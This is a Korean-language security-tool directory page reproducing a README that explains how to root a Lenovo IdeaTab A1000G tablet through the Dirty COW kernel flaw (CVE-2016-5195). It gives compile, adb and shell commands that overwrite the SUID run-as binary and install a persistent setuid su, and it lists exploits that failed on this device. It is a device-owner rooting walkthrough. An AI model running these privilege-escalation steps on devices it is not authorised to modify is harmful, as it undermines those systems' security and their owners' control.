Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
lenovo-a1000g-mt8317-A412_01_09_130907-kernel-3.4.0-root-cve-2016-5195 — [AI 지원] Lenovo IdeaTab A1000G (MT8317, kernel 3.4.0, Android 4.1)의 루팅 방법 - CVE-2016-5195 (Dirty COW) 이용 | Kitploit
도구/GitHubGitHub/endgtryna/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195
Android SecurityPrivilege EscalationVulnerability AnalysisExploitationMobile SecurityBinary Exploitation
GitHubendgtryna/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

lenovo-a1000g-mt8317-A412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

[AI 지원] Lenovo IdeaTab A1000G (MT8317, kernel 3.4.0, Android 4.1)의 루팅 방법 - CVE-2016-5195 (Dirty COW) 이용

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1개월 전아직 검토되지 않음

Lenovo IdeaTab A1000G — 루트

참고: 이 문서와 익스플로잇 코드는 AI 도움(Kiro)으로 생성되었습니다. 사용 전에 확인하세요 — AI는 실수를 할 수 있습니다.

장치

필드값
모델Lenovo IdeaTab A1000G
SoCMediaTek MT8317 (= MT6517)
CPU듀얼코어 Cortex-A9 @ 1.2GHz
커널Linux 3.4.0
빌드A1000G_A412_01_09_130907_2G
Android4.1.2 (Jelly Bean)

전제 조건

  • USB 디버깅 활성화
  • ADB 연결
  • Android NDK r28+ at ~/Android/Sdk/ndk/
  • busybox-armv7l 정적 바이너리 (busybox.net/downloads/binaries/1.21.1/)

익스플로잇 — CVE-2016-5195 (Dirty COW)

커널 mmap/write 경로의 경쟁 조건. 커널 2.6.22–4.8.3에 영향. 대상: /system/bin/run-as (SUID 루트, 9448 바이트).

1. 컴파일

root@kitploit:~
NDK=~/Android/Sdk/ndk/28.2.13676358/toolchains/llvm/prebuilt/linux-x86_64/bin
CC=$NDK/armv7a-linux-androideabi21-clang

# dcow exploit
$CC -o dcow -static -march=armv7-a -mfloat-abi=softfp -O1 \
    -UPRINT -UDEBUG "-DLOGV(...)=printf(__VA_ARGS__)" \
    dcow_main.c dirtycow_android.c

# su binary
$CC -o su -march=armv7-a -mfloat-abi=softfp -Os -s -fno-pie -no-pie su2_src.c

2. su를 대상 크기(9448 바이트)로 패딩

root@kitploit:~
with open('su', 'rb') as f: data = f.read()
data = data + b'\x00' * (9448 - len(data))
with open('su_padded', 'wb') as f: f.write(data)

3. 실행

root@kitploit:~
adb push dcow su_padded su /data/local/tmp/
adb shell chmod 755 /data/local/tmp/dcow /data/local/tmp/su_padded /data/local/tmp/su
adb shell "/data/local/tmp/dcow /data/local/tmp/su_padded /system/bin/run-as"
# Wait for: [+] Success!

4. su를 영구적으로 설치

root@kitploit:~
# Enter root shell first
adb shell /system/bin/run-as

# Then:
mount -o remount,rw /system
toolbox dd if=/data/local/tmp/su of=/system/bin/su
toolbox chmod 6755 /system/bin/su
toolbox chown root:root /system/bin/su

5. busybox 설치 (선택사항)

root@kitploit:~
# From PC:
adb push busybox-armv7l /data/local/tmp/busybox

# From root shell:
toolbox dd if=/data/local/tmp/busybox of=/system/bin/busybox
toolbox chmod 755 /system/bin/busybox
/system/bin/busybox --install /system/bin/

사용법

root@kitploit:~
adb shell
/system/bin/run-as   # drops to root shell (#)
id                   # uid=0(root)

adb shell /system/bin/su -c cmd는 작동하지 않습니다 — ADB가 setuid를 드롭합니다. 먼저 대화형 셸에 진입해야 합니다.

루트 후

  • /system/bin/run-as → 덮어씀 (원래 run-as 기능 손상)
  • /system/bin/su → 영구 SUID su 바이너리
  • /system/bin/busybox → busybox 1.21.1

실패한 시도

방법이유
CVE-2013-1763 sock_diag커널에 컴파일되지 않음
CVE-2013-6282 get_user/put_userCortex-A9에서 ldrt/strt 차단됨

파일

root@kitploit:~
.
├── README.md
├── root.sh              # automated root script
├── dirtycow_android.c   # CVE-2016-5195 core (Arinerron fork)
├── dcow_main.c          # main() wrapper
└── su2_src.c            # su binary source

사전 컴파일된 바이너리는 포함되지 않습니다 — 위 단계를 따라 소스에서 컴파일하세요.

참고 자료

  • CVE-2016-5195 소스: Arinerron/CVE-2016-5195
  • 펌웨어 ROM (다른 빌드, 커널 심볼 추출 전용 사용): Lenovo_A1000G_MT6577_01_24_130329 — 이 ROM의 심볼은 빌드 A412_01_09_130907에서도 작동합니다. 둘 다 동일한 커널 가상 레이아웃을 공유하기 때문입니다.
도구 다운로드
CVE-2014-3153 Towelroot커널 패닉 — MTK에 대해 sendmmsg iovstack 오프셋 오류
Framaroot AdbActivityNullPointerException, 호환되지 않음
/proc/self/mem 덮어쓰기커널 주소를 사용자 공간에서 접근 불가